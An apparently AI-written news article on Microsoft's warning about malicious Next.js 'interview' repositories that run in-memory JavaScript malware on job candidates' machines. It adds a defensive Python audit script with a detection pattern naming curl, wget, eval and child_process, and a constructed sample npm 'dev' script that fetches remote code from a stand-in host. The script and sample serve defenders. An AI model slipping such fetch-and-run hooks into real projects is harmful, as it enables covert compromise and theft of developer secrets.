Microsoft flags malicious interview repos targeting Next.js jobseekers
Microsoft says a limited set of malicious “interview” repositories have been tied to real compromises, luring Next.js jobseekers into running in‑memory JavaScript malware, according to The Register.
Quick Summary
- Microsoft says a limited set of malicious “interview” repositories have been tied to real compromises, luring Next.js jobseekers into running in‑memory JavaScript malware, according to The Register.
- Key company: Microsoft
Microsoft’s threat‑intel team says the malicious “interview” repos are engineered to blend into the normal Next.js development flow, exploiting the very tools developers trust. One variant leverages Visual Studio Code’s workspace automation, automatically loading files the moment a candidate opens the project. The code then pulls a JavaScript loader from Vercel, runs it under Node.js, and immediately begins beaconing to an attacker‑controlled command‑and‑control (C2) server, according to Microsoft’s findings reported by The Register.
Other attack paths trigger when the victim starts the Next.js development server—either by running `npm run dev` or by launching the backend directly. In these cases, trojanized assets or altered library files embed the loader, which executes during server initialization or module import. Regardless of the entry point, the payload registers the infected device, launches a secondary Node interpreter to run in‑memory JavaScript tasks, and opens a persistent outbound channel to the C2 infrastructure. The controller can rotate IP addresses and API identifiers to evade detection, and it retrieves a `messages[]` array of JavaScript commands that are executed without leaving files on disk, allowing the exfiltration of source code, API secrets, personal data, or cloud credentials, Microsoft said.
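A defender-side pre-open audit of an untrusted repository for the two repo-level entry points described above (editor auto-run and the `npm run dev` script), added here as an example; it is not code from Microsoft's report or The Register's coverage. The article does not name the exact VS Code mechanism, so the script assumes the `tasks.json` auto-run option (`runOptions.runOn` set to `"folderOpen"`), the sample manifests and the loader URL are constructed, and altered files inside `node_modules` are out of scope.

```python
import json
import re

# Patterns for fetch-and-run-remote-code or second-interpreter behaviour.
SUSPICIOUS = re.compile(
    r"curl\s|wget\s|node\s+-e\b|eval\(|https?://|child_process|powershell",
    re.IGNORECASE,
)

def audit_vscode_tasks(text: str) -> list[str]:
    """Flag tasks.json entries that run as soon as the folder is opened.
    Assumption: the auto-run hook is runOptions.runOn == "folderOpen"."""
    try:
        tasks = json.loads(text).get("tasks", [])
    except json.JSONDecodeError:
        # VS Code accepts comments in tasks.json; do not silently skip it.
        return ["tasks.json is not strict JSON (review manually)"]
    return [
        f"auto-run task {t.get('label', '?')!r}: {t.get('command')}"
        for t in tasks
        if t.get("runOptions", {}).get("runOn") == "folderOpen"
    ]

def audit_package_scripts(text: str) -> list[str]:
    """Flag npm scripts (e.g. the `dev` script behind `npm run dev`) that
    fetch or execute remote code before or alongside `next dev`."""
    scripts = json.loads(text).get("scripts", {})
    return [
        f"script {name!r} looks suspicious: {cmd}"
        for name, cmd in scripts.items()
        if SUSPICIOUS.search(cmd)
    ]

# Constructed sample manifests (not real indicators) for demonstration.
SAMPLE_TASKS = json.dumps({
    "tasks": [{
        "label": "setup", "type": "shell",
        "command": "node ./.vscode/setup.js",
        "runOptions": {"runOn": "folderOpen"},
    }],
})
SAMPLE_PACKAGE = json.dumps({
    "scripts": {
        "dev": "node -e \"require('https').get('https://loader.example/l.js')\" && next dev",
        "build": "next build",
    },
})

if __name__ == "__main__":
    for finding in audit_vscode_tasks(SAMPLE_TASKS) + audit_package_scripts(SAMPLE_PACKAGE):
        print("FINDING:", finding)
```

Run it against a freshly cloned repository's `.vscode/tasks.json` and `package.json` before opening the folder in the editor or starting the dev server.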
The C2 server also issues kill‑switch commands, monitors spawned processes for performance anomalies, and reports error telemetry back to the attackers, enabling rapid refinement of the malicious code. By keeping the malicious logic in memory and limiting on‑disk artifacts, the campaign reduces its footprint against traditional anti‑malware scanners. Microsoft warned that developers who run these “interview” assessments on corporate machines could inadvertently open a foothold for broader network compromise, a risk highlighted in the report.
Defenders are being urged to treat developer workstations as a primary attack surface. Microsoft recommends heightened visibility into unexpected Node.js executions, outbound connections from development environments, and any anomalous file‑system or network activity that originates during routine coding tasks. The guidance aligns with broader industry calls to secure the software supply chain, especially as the Next.js ecosystem continues to grow and attract talent through code‑based hiring exercises.
This article was created using AI technology and reviewed by the SectorHQ editorial team for accuracy and quality.